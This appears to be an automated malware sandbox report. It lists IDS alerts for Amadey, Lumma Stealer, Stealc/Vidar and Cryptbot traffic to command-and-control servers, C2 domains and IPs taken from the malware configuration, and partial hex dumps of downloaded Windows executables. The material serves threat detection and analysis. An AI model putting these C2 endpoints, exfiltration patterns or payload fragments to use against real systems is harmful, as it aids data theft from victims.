                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49871 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:57750 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:57628 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49890 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:56849 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49889 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49906 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49917 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49852 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49923 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49897 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.5:56185 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49911 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49933 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49942 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49944 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49953 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49963 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49972 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.5:49992 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50008 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.5:50045 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50080 -> 185.121.15.192:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50090 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50096 -> 185.121.15.192:80
                          Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:50142 -> 185.121.15.192:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50141 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:64319 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:52758 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50152 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50157 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50151 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50161 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50163 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50164 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50165 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50167 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:50165 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:50165
                          Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:50165 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50166 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:50165
                          Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:50165 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:51579 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:52028 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50169 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50170 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50178 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50180 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50176 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50205 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50213 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50217 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50220 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50223 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50225 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50216 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:59899 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:63484 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50266 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50274 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50278 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50281 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50279 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50286 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50288 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:50291 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50289 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50293 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50296 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50301 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50300 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50378 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50376
                          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50394 -> 185.215.113.43:80
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49950 -> 116.203.12.114:443
                          Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49941 -> 116.203.12.114:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49890 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.5:49958
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49890 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49998 -> 172.67.180.113:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49998 -> 172.67.180.113:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49911 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49911 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49992 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49917 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49917 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49933 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49963 -> 104.21.23.76:443
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.5:49966
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50151 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50151 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50157 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50157 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50161 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50178 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50178 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50180 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50223 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50223 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50225 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50266 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50266 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50291 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50274 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50274 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50288 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50288 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50169 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50170 -> 172.67.197.170:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50170 -> 172.67.197.170:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: crosshuaht.lat
                          Source: Malware configuration extractorURLs: grannyejh.lat
                          Source: Malware configuration extractorURLs: aspecteirs.lat
                          Source: Malware configuration extractorURLs: energyaffai.lat
                          Source: Malware configuration extractorURLs: discokeyus.lat
                          Source: Malware configuration extractorURLs: pancakedipyps.click
                          Source: Malware configuration extractorURLs: rapeflowwj.lat
                          Source: Malware configuration extractorURLs: necklacebudi.lat
                          Source: Malware configuration extractorURLs: sustainskelet.lat
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                          Source: Malware configuration extractorIPs: 185.215.113.43
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:14:10 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:14:23 GMTContent-Type: application/octet-streamContent-Length: 863093Last-Modified: Fri, 20 Dec 2024 20:00:38 GMTConnection: keep-aliveETag: "6765cce6-d2b75"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 c4 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 82 9d 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 ba 52 00 00 00 00 00 00 00 00 00 00 a5 06 0d 00 d0 24 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 ba 52 00 00 00 00 10 00 00 54 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 60 10 00 00 10 00 00 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
